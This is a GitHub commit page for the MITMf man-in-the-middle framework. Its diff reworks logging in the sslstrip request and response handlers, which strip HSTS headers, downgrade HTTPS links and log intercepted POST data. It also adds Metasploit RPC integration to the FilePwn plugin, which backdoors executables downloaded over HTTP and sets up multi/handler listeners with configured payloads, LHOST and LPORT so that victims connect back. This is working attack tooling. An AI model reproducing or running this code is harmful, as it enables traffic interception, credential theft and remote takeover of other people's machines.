github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-07 13:32:18 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

- Fixed bug where sometimes DNS wouldn't resolve local IP's

Browse source 
- Added Metasploit integration to Filepwn plugin
This commit is contained in:
byt3bl33d3r 2015-04-15 18:19:19 +02:00
parent 8eb09309d2
commit b91bb4271b
5 changed files with 84 additions and 56 deletions
Download patch file Download diff file Expand all files Collapse all files

36
core/sslstrip/ClientRequest.py
View file

@ -72,7 +72,7 @@ class ClientRequest(Request):
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-none-match' in headers:
@ -80,13 +80,13 @@ class ClientRequest(Request):
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost(str(headers['host']))
mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host))
mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
headers['host'] = host
self.setHeader('Host', host)
if 'accept-encoding' in headers:
del headers['accept-encoding']
mitmf_logger.debug("Zapped encoding")
mitmf_logger.debug("[ClientRequest] Zapped encoding")
if 'if-modified-since' in headers:
del headers['if-modified-since']
@ -117,7 +117,7 @@ class ClientRequest(Request):
return "lock.ico"
def handleHostResolvedSuccess(self, address):
mitmf_logger.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address))
mitmf_logger.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host")
headers = self.cleanHeaders()
client = self.getClientIP()
@ -138,13 +138,13 @@ class ClientRequest(Request):
url = 'http://' + host + path
self.uri = url # set URI to absolute
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
if real:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
@ -155,22 +155,22 @@ class ClientRequest(Request):
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
mitmf_logger.debug("Sending expired cookies...")
mitmf_logger.debug("[ClientRequest] Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
mitmf_logger.debug("Sending spoofed favicon response...")
mitmf_logger.debug("[ClientRequest] Sending spoofed favicon response")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
mitmf_logger.debug("Sending request via SSL...(%s %s)" % (client,url))
mitmf_logger.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else:
mitmf_logger.debug("Sending request via HTTP...")
mitmf_logger.debug("[ClientRequest] Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
@ -189,7 +189,7 @@ class ClientRequest(Request):
address = self.dnsCache.getCachedAddress(host)
if address != None:
mitmf_logger.debug("[ClientRequest] Host cached: %s %s" % (host, str(address)))
mitmf_logger.debug("[ClientRequest] Host cached: {} {}".format(host, str(address)))
return defer.succeed(address)
else:
@ -197,20 +197,22 @@ class ClientRequest(Request):
if self.resolver == 'dnschef':
try:
mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address)
except Exception:
return defer.fail()
mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()")
return reactor.resolve(host)
elif self.resolver == 'twisted':
return reactor.resolve(host)
def process(self):
mitmf_logger.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host')))
mitmf_logger.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
if self.hsts:
host = self.urlMonitor.URLgetRealHost("%s"%host)
host = self.urlMonitor.URLgetRealHost(str(host))
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)

35
core/sslstrip/ServerConnection.py
View file

@ -70,18 +70,18 @@ class ServerConnection(HTTPClient):
if self.command == 'GET':
try:
user_agent = parse(self.headers['user-agent'])
self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
except:
self.clientInfo = "%s " % self.client.getClientIP()
self.clientInfo = "{} ".format(self.client.getClientIP())
mitmf_logger.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.iteritems():
mitmf_logger.debug("Sending header: (%s => %s)" % (header, value))
mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value))
self.sendHeader(header, value)
self.endHeaders()
@ -92,11 +92,11 @@ class ServerConnection(HTTPClient):
elif 'keylog' in self.uri:
self.plugins.hook()
else:
mitmf_logger.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
self.transport.write(self.postData)
def connectionMade(self):
mitmf_logger.debug("HTTP connection made.")
mitmf_logger.debug("[ServerConnection] HTTP connection made.")
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
@ -105,11 +105,11 @@ class ServerConnection(HTTPClient):
self.sendPostData()
def handleStatus(self, version, code, message):
mitmf_logger.debug("Got server response: %s %s %s" % (version, code, message))
mitmf_logger.debug("[ServerConnection] Got server response: {0} {1} {2}".format(version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
mitmf_logger.debug("[ServerConnection] Receiving header: (%s => %s)" % (key, value))
mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
@ -119,15 +119,15 @@ class ServerConnection(HTTPClient):
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
mitmf_logger.debug("Response is image content, not scanning...")
mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
mitmf_logger.debug("Response is compressed...")
mitmf_logger.debug("[ServerConnection] Response is compressed...")
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
mitmf_logger.info("%s Zapped a strict-trasport-security header" % self.client.getClientIP())
mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP()))
elif (key.lower() == 'content-length'):
self.contentLength = value
@ -164,10 +164,11 @@ class ServerConnection(HTTPClient):
def handleResponse(self, data):
if (self.isCompressed):
mitmf_logger.debug("Decompressing content...")
mitmf_logger.debug("[ServerConnection] Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
#mitmf_logger.debug("Read from server:\n" + data)
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
data = self.replaceSecureLinks(data)
res = self.plugins.hook()
@ -184,7 +185,7 @@ class ServerConnection(HTTPClient):
try:
self.shutdown()
except:
mitmf_logger.info("Client connection dropped before request finished.")
mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
if self.hsts:
@ -193,7 +194,7 @@ class ServerConnection(HTTPClient):
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
@ -202,13 +203,13 @@ class ServerConnection(HTTPClient):
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
mitmf_logger.debug("[ServerConnection][HSTS] Replacing %s => %s"%(url,nuevaurl))
mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#mitmf_logger.debug("HSTS DEBUG received data:\n"+data)
@ -227,7 +228,7 @@ class ServerConnection(HTTPClient):
for match in iterator:
url = match.group()
mitmf_logger.debug("Found secure reference: " + url)
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&', '&')

45
plugins/FilePwn.py
View file

@ -67,6 +67,7 @@ import multiprocessing
from libs.bdfactory import pebin
from libs.bdfactory import elfbin
from libs.bdfactory import machobin
from core.msfrpc import Msfrpc
from plugins.plugin import Plugin
from tempfile import mkstemp
from configobj import ConfigObj
@ -79,7 +80,7 @@ class FilePwn(Plugin):
desc = "Backdoor executables being sent over http using bdfactory"
implements = ["handleResponse"]
tree_output = ["BDFProxy v0.3.2 online"]
version = "0.2"
version = "0.3"
has_opts = False
def initialize(self, options):
@ -109,6 +110,20 @@ class FilePwn(Plugin):
#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
#Metasploit options
msfcfg = options.configfile['MITMf']['Metasploit']
rpcip = msfcfg['rpcip']
rpcpass = msfcfg['rpcpass']
try:
self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
self.msf.login('msf', rpcpass)
version = self.msf.call('core.version')['version']
self.tree_output.append("Connected to Metasploit v%s" % version)
except Exception:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
#FilePwn options
self.userConfig = options.configfile['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
@ -123,6 +138,32 @@ class FilePwn(Plugin):
self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist']
self.tree_output.append("Setting up Metasploit payload handlers")
jobs = self.msf.call('job.list')
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
cmd = "use exploit/multi/handler\n"
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
cmd += "set LHOST {}\n".format(config["HOST"])
cmd += "set LPORT {}\n".format(config["PORT"])
cmd += "exploit -j\n"
if jobs:
for pid, name in jobs.iteritems():
info = self.msf.call('job.info', [pid])
if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
#Create a virtual console
c_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [c_id, cmd])
else:
#Create a virtual console
c_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [c_id, cmd])
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True
@ -300,7 +341,7 @@ class FilePwn(Plugin):
except Exception as e:
print 'Exception', str(e)
mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e))
mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
return None
def tar_files(self, aTarFileBytes, formatt):

21
plugins/JavaPwn.py
View file

@ -18,13 +18,13 @@
# USA
#
import core.msfrpc as msfrpc
import string
import random
import threading
import sys
import logging
from core.msfrpc import Msfrpc
from plugins.plugin import Plugin
from plugins.BrowserProfiler import BrowserProfiler
from time import sleep
@ -71,7 +71,7 @@ class JavaPwn(BrowserProfiler, Plugin):
self.black_ips = []
try:
msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version']
self.tree_output.append("Connected to Metasploit v%s" % version)
@ -233,20 +233,3 @@ class JavaPwn(BrowserProfiler, Plugin):
self.send_command(cmd, msf, vic_ip)
self.injectWait(msf, rand_url, vic_ip)
sleep(1)
def finish(self):
'''This will be called when shutting down'''
msf = msfrpc.Msfrpc({"host": self.rpcip})
msf.login('msf', self.rpcpass)
jobs = msf.call('job.list')
if len(jobs) > 0:
print '\n[*] Stopping all running metasploit jobs'
for k, v in jobs.iteritems():
msf.call('job.stop', [k])
consoles = msf.call('console.list')['consoles']
if len(consoles) > 0:
print "[*] Closing all virtual consoles"
for console in consoles:
msf.call('console.destroy', [console['id']])

3
requirements.txt
View file

@ -9,4 +9,5 @@ configobj
pyyaml
ua-parser
Pillow
pefile
pefile
pypcap